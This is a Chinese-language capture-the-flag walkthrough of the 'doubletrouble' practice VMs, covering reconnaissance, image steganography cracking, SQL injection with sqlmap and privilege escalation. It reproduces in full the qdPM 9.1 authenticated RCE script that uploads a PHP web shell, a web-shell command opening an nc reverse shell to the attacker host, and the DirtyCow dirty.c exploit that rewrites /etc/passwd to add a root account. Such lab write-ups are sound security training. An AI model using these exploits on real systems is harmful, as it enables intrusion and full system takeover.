doubletrouble 双重麻烦
一 信息收集
IP扫描
端口扫描
80
目录扫描
访问 uploads
访问 secret 发现图片
下载 图片
安装工具
谷歌网址
https://github.com/RickdeJager/stegseek/releases
解压字典
解析图片
查看 output 得到 邮箱 和 密码
登录 80 网页
二 漏洞利用
1 上传反弹shell木马获取用户shell
修改个人信息这里 可以上传文件
生成shell (https://www.revshells.com/) 的 PHP pentestmonkey
ip改为 kali 的ip 端口改为shell反弹的端口
保存到文件
上传报错
查看http://10.4.7.146/uploads/users/ 上传成功
kali 开启监听 浏览器点击shell
切换到shell
python -c 'importpty;pty.spawn("/bin/bash")'
2 通过qdPM9.1中间键漏洞获取用户shell
searchsploit -u #更新漏洞库
searchsploit qdpm #查找有关qdpm有关的漏洞
searchsploit -m 47954.py
searchsploit -m 50175.py
vim 47954 是用Python2.7来写的,在执行的时候后面跟url、邮箱地址和密码,分别使用参数-url、-u、-p,邮箱地址和密码应该就是图片中破解出来的信息
vim 50175是用python3写的,且这个脚本是基于47954.py编写的,命令执行格式应该跟47954.py差不多
set nu 序号显示
59 行 取消换行
71 行 代码没有结束
生成一个后门
可以拿走用,不确定复制粘贴后是不是正确的
# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2021-08-03
# Original Exploit Author: Rishal Dwivedi (Loginsoft)
# Original ExploitDB ID: 47954
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: <=1.9.1
# Tested on: Ubuntu Server 20.04 (Python 3.9.2)
# CVE : CVE-2020-7246
# Exploit written in Python 3.9.2
# Tested Environment - Ubuntu Server 20.04 LTS
# Path Traversal + Remote Code Execution
#!/usr/bin/python3
import sys
import requests
from lxml import html
from argparse import ArgumentParser
session_requests = requests.session()
def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):
request_1 = {
'sf_method': (None, 'put'),
'users[id]': (None, userid[-1]),
'users[photo_preview]': (None, uservar),
'users[_csrf_token]': (None, csrftoken_[-1]),
'users[name]': (None, username[-1]),
'users[new_password]': (None, ''),
'users[email]': (None, EMAIL),
'extra_fields[9]': (None, ''),
'users[remove_photo]': (None, '1'),
}
return request_1
def req(userid, username, csrftoken_, EMAIL, HOSTNAME):
request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME,
'.htaccess')
new = session_requests.post(HOSTNAME + 'index.php/myAccount/update',
files=request_1)
request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME,
'../.htaccess')
new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update',
files=request_2)
request_3 = {
'sf_method': (None, 'put'),
'users[id]': (None, userid[-1]),
'users[photo_preview]': (None, ''),
'users[_csrf_token]': (None, csrftoken_[-1]),
'users[name]': (None, username[-1]),
'users[new_password]': (None, ''),
'users[email]': (None, EMAIL),
'extra_fields[9]': (None, ''),
'users[photo]': ('backdoor.php',
'<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'
, 'application/octet-stream'),
}
upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)
def main(HOSTNAME, EMAIL, PASSWORD):
url = HOSTNAME + '/index.php/login'
result = session_requests.get(url)
#print(result.text)
login_tree = html.fromstring(result.text)
authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]
payload = {'login[email]': EMAIL, 'login[password]': PASSWORD,
'login[_csrf_token]': authenticity_token}
result = session_requests.post(HOSTNAME + '/index.php/login',
data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))
# The designated admin account does not have a myAccount page
account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')
account_tree = html.fromstring(account_page.content)
userid = account_tree.xpath("//input[@name='users[id]']/@value")
username = account_tree.xpath("//input[@name='users[name]']/@value")
csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
req(userid, username, csrftoken_, EMAIL, HOSTNAME)
get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
final_tree = html.fromstring(get_file.content)
backdoor = final_tree.xpath("//input[@name='users[photo_preview]']/@value")
print('Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' + backdoor[-1] + '?cmd=whoami')
if __name__ == '__main__':
print("You are not able to use the designated admin account becauseetthey do not have a myAccount page.\n")
parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')
parser.add_argument('-url', '--host', dest='hostname', help='Project URL')
parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)')
parser.add_argument('-p', '--password', dest='password', help='User password')
args = parser.parse_args()
# Added detection if the arguments are passed and populated, if not display the arguments
if (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)):
main(args.hostname, args.email, args.password)
else:
parser.print_help()
python3 50175.py -url http://10.4.7.146/ -u [email protected] -p otis666
http://10.4.7.146//uploads/users/?cmd=whoami
在 http://10.4.7.146//uploads/users/224899-backdoor.php 后面加 ? cmd=id
http://10.4.7.146//uploads/users/224899-backdoor.php?cmd=pwd 文件路径
http://10.4.7.146//uploads/users/224899-backdoor.php?cmd=nc -e /bin/bash 10.4.7.139 1234
反弹成功
python -c 'importpty;pty.spawn("/bin/bash")'
使用Python切换到bash这个shell中
三提权
sudo -l
这个文件显示可以不用密码操作,对他进行提权
提权
sudo awk 'BEGIN {system("/bin/bash")}'
ls 看下 发现第二个靶机
cp doubletrouble.ova /var/www/html/uploads
将该靶机复制到网站根目录的uploads目录中,然后下载到本地
在网站根目录的uploads目录中点击下载
或者用命令下载
一 信息收集
IP扫描
端口扫描
80
使用sqlmap进行扫描,发现存在时间盲注
sqlmap -u "http://10.4.7.151/index.php" --forms --batch
sql
爆 数据库
sqlmap -u "http://10.4.7.151/index.php" --forms --batch --current-db
当前数据库为doubletrouble
爆 表
sqlmap -u "http://10.4.7.151/index.php" --forms --batch -D doubletrouble --tables
爆 列
sqlmap -u "http://10.4.7.151/index.php" --forms --batch -D doubletrouble -T users --columns
爆 字段
sqlmap -u "http://10.4.7.151/index.php" --forms --batch -D doubletrouble -T users -C username,password --dump
爆出 账号密码
montreux GfsZxc1
clapton ZubZub99
使用从数据库中获得的这两个用户名和密码进行80端口登陆和22端口ssh登陆尝试
80端口:两个用户都无法登陆
22端口:montreux用户不能进行ssh远程登录,但clapton用户可以
登陆clapton用户,成功获取到clapton用户的shell
二 提权
查看 系统内核发现系统的内核版本是linux3.2,该系统版本具有一个很明显的漏洞--脏牛漏洞
在kali漏洞库里查找符合条件的POC
searchsploit linux 3.2
searchsploit -m 40616.c 下载
在clapton的shell中启动nc接收
nc -lvnp 10086 > 40616.c
在kali中使用nc上传40616.c
nc 10.4.7.151 10086 < 40616.c -w 1
找到 flag
6CEA7A737C7C651F6DA7669109B5FB52
没用
发现40616.c还没有执行权限,先给它赋予执行权限,然后再使用gcc生成可执行程序
拿到管理员
拿到最后一个flag
其实,脏牛漏洞提权的POC还有很多,很多人会使用这个dirty.c来创建管理员账户进行管理员登录,从而获得管理员shell
使用dirty.c提权
创建
代码
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
// The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>
const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";
int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;
struct Userinfo {
char *username;
char *hash;
int user_id;
int group_id;
char *info;
char *home_dir;
char *shell;
};
char *generate_password_hash(char *plaintext_pw) {
return crypt(plaintext_pw, salt);
}
char *generate_passwd_line(struct Userinfo u) {
const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
int size = snprintf(NULL, 0, format, u.username, u.hash,
u.user_id, u.group_id, u.info, u.home_dir, u.shell);
char *ret = malloc(size + 1);
sprintf(ret, format, u.username, u.hash, u.user_id,
u.group_id, u.info, u.home_dir, u.shell);
return ret;
}
void *madviseThread(void *arg) {
int i, c = 0;
for(i = 0; i < 200000000; i++) {
c += madvise(map, 100, MADV_DONTNEED);
}
printf("madvise %d\n\n", c);
}
int copy_file(const char *from, const char *to) {
// check if target file already exists
if(access(to, F_OK) != -1) {
printf("File %s already exists! Please delete it and run again\n",
to);
return -1;
}
char ch;
FILE *source, *target;
source = fopen(from, "r");
if(source == NULL) {
return -1;
}
target = fopen(to, "w");
if(target == NULL) {
fclose(source);
return -1;
}
while((ch = fgetc(source)) != EOF) {
fputc(ch, target);
}
printf("%s successfully backed up to %s\n",
from, to);
fclose(source);
fclose(target);
return 0;
}
int main(int argc, char *argv[])
{
// backup file
int ret = copy_file(filename, backup_filename);
if (ret != 0) {
exit(ret);
}
struct Userinfo user;
// set values, change as needed
user.username = "firefart";
user.user_id = 0;
user.group_id = 0;
user.info = "pwned";
user.home_dir = "/root";
user.shell = "/bin/bash";
char *plaintext_pw;
if (argc >= 2) {
plaintext_pw = argv[1];
printf("Please enter the new password: %s\n", plaintext_pw);
} else {
plaintext_pw = getpass("Please enter the new password: ");
}
user.hash = generate_password_hash(plaintext_pw);
char *complete_passwd_line = generate_passwd_line(user);
printf("Complete line:\n%s\n", complete_passwd_line);
f = open(filename, O_RDONLY);
fstat(f, &st);
map = mmap(NULL,
st.st_size + sizeof(long),
PROT_READ,
MAP_PRIVATE,
f,
0);
printf("mmap: %lx\n",(unsigned long)map);
pid = fork();
if(pid) {
waitpid(pid, NULL, 0);
int u, i, o, c = 0;
int l=strlen(complete_passwd_line);
for(i = 0; i < 10000/l; i++) {
for(o = 0; o < l; o++) {
for(u = 0; u < 10000; u++) {
c += ptrace(PTRACE_POKETEXT,
pid,
map + o,
*((long*)(complete_passwd_line + o)));
}
}
}
printf("ptrace %d\n",c);
}
else {
pthread_create(&pth,
NULL,
madviseThread,
NULL);
ptrace(PTRACE_TRACEME);
kill(getpid(), SIGSTOP);
pthread_join(pth,NULL);
}
printf("Done! Check %s to see if the new user was created.\n", filename);
printf("You can log in with the username '%s' and the password '%s'.\n\n",
user.username, plaintext_pw);
printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
backup_filename, filename);
return 0;
}
在clapton的shell中启动nc接收
nc -lvnp > 40616.c
在kali中使用nc上传40616.c
nc 10.4.7.151 8888 < 40616.c -w 1
赋权
gcc连接,然后执行POC,需要注意的是,这里在执行POC后面可以接密码,即重新创建一个用户firefart,该用户具有管理员权限
此外,gcc连接需要使用如下命令
gcc -pthread dirty.c -o dirty -lcrypt
root为firefart用户密码
使用ssh登陆firefart用户,再次成功拿到管理员权限
